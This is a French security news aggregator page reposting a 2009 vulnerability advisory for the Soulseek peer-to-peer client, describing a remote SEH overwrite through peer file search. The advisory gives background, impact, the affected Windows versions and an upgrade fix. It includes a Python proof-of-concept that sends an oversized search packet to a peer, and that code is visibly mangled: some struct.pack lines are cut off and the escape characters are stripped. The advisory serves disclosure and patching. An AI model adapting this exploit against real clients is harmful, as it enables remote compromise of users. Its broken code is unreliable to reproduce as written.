|
|
|
Soulseek 157 NS 13e 156.* Remote Peer Search Code Execution |
Si vous voulez bloquer ce service sur vos fils RSS
Si vous voulez nous contacter ou nous proposer un fil RSS
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
Soulseek 157 NS 13e 156.* Remote Peer Search Code Execution Par Laurent Gaffié blogLe [2009-07-03] à 07:01:53
Présentation : Soulseek 157 NS 13e et 156.* Remote Peer Search Code Execution ============================================= - Release date: July 02, 2009 - Discovered by: Laurent Gaffié - Severity: critical ============================================= I. VULNERABILITY ------------------------- Soulseek 157 NS 13e et 156.* Remote Peer Search Code Execution II. BACKGROUND ------------------------- "Soulseek(tm) is a unique ad-free, spyware free, and just plain free file sharing application. One of the things that makes Soulseek(tm) unique is our community and community-related features. Based on peer-to-peer technology, virtual rooms allow you to meet people with the same interests, share information, and chat freely using real-time messages in public or private. Soulseek(tm), with its built-in people matching system, is a great way to make new friends and expand your mind!" III. DESCRIPTION ------------------------- Soulseek client allows direct peer file search, allowing a user to find the files he wants directly on the peer computer. Unfortunatly this feature is vulnerable to a remote SEH overwrite. IV. PROOF OF CONCEPT ------------------------- This proof of concept will target a user called 123yow123. import struct import sys, socket from time import * ip = "IP_ADDR" port = "PORT_NUM" #You can find out, how to find out IP/PORT if you RTFM :) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) try: s.connect((ip,port)) except: print "Can\'t connect to peer! " sys.exit(0) junk = "x41" * 3084 next_seh = struct.pack('seh = struct.pack('other_junk = "x61" * 1424 buffer = "x17x00x00x00x01x09x00x00x00x31x32x33x79x6fx77x31" buffer+= "x32x33x01x00x00x00x50x00x00x00x00x21x0cx00x00x08" buffer+= "x00x00x00x6cx7bx1dx0cx15x0cx00x00"+junk+next_seh+seh+other_junk s.send(buffer) After the query is send, the SEH handler will get overwriten. V. BUSINESS IMPACT ------------------------- An attacker could exploit this vulnerability to compromise any prior to 157 NS 13e Soulseek client VI. SYSTEMS AFFECTED ------------------------- Windows all versions VII. SOLUTION ------------------------- Upgrade to 157 NS 13e (http://slsknet.org/download.html) VIII. REFERENCES ------------------------- http://www.slsknet.org IX. CREDITS ------------------------- This vulnerability has been discovered by Laurent Gaffié Laurent.gaffie{remove-this}(at)gmail.com X. REVISION HISTORY ------------------------- july 02, 2009 XI. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. XII. PERSONAL NOTES ------------------------ Souleek team as patched this bug month ago, a distributed message urging users to upgrade them Soulseek client is still send since a month, and not much users still use vulnerable Soulseek versions. @to the one who like to rip bugs and make an exploit ""universal"" for fame, just make sure it's at least universal before you say so. For the others : http://www.youtube.com/watch?v=tVACUjHn6yU :) @RIIA : http://www.openp2p.com/pub/a/p2p/2002/12/11/piracy.html []
Les mots clés de la revue de presse pour cet article : remote
Les videos sur SecuObs pour les mots clés : remote
Les derniers articles du site "Laurent Gaffié blog" :
- More details on MS10-006
Menu > Articles de la revue de presse : - l'ensemble [ tous | francophone] - par mots clé [ tous] - par site [ tous] - le tagwall [ voir] - Top bi-hebdo de la revue de presse [ Voir]
Si vous voulez bloquer ce service sur vos fils RSS :
- avec iptables "iptables -A INPUT -s 88.191.75.173 --dport 80 -j DROP"
- avec ipfw et wipfw "ipfw add deny from 88.191.75.173 to any 80"
- Nous contacter par mail
| Mini-Tagwall des articles publiés sur SecuObs : | | | | sécurité, exploit, windows, microsoft, réseau, attaque, outil, vulnérabilité, audit, système, virus, internet, données, présentation, metasploit, linux, bluetooth, protocol, vista, scanner, réseaux, shell, engineering, rootkit, paquet, conférence, trames, wishmaster, téléphone, source, sysun, noyau, mobile, https, mémoire, rapport, botnet, téléphones, libre, reverse, navigateur, patch, snort, scapy, intel |
| Mini-Tagwall de l'annuaire video : | | | | vmware, security, virus, biometric, windows, lockpicking, password, botnet, metasploit, tutorial, attack, crypt, linux, network, iphone, server, exploit, conficker, wimax, virtu, virtual, engineering, cisco, reverse, shmoocon, ettercap, wireshark, hacker, firewall, internet, knoppix, rootkit, arduino, wireless, source, conference, backtrack, brucon, openbsd, systm, overflow, openssh, buffer, access, remote |
| Mini-Tagwall des articles de la revue de presse : | | | | security, microsoft, windows, hacker, attack, network, vulnerability, google, exploit, malware, internet, remote, iphone, server, inject, patch, apple, twitter, mobile, virus, ebook, facebook, vulnérabilité, crypt, source, linux, password, intel, research, virtual, phish, access, tutorial, trojan, social, privacy, firefox, adobe, overflow, office, cisco, conficker, botnet, pirate, sécurité |
| Mini-Tagwall des Tweets de la revue Twitter : | | | | security, linux, botnet, attack, metasploit, cisco, defcon, phish, exploit, google, inject, server, firewall, network, twitter, vmware, windows, microsoft, compliance, vulnerability, python, engineering, source, kernel, crypt, social, overflow, nessus, crack, hacker, virus, iphone, patch, virtual, javascript, malware, conficker, pentest, research, email, password, adobe, apache, proxy, backtrack |
|
|
|
|
|
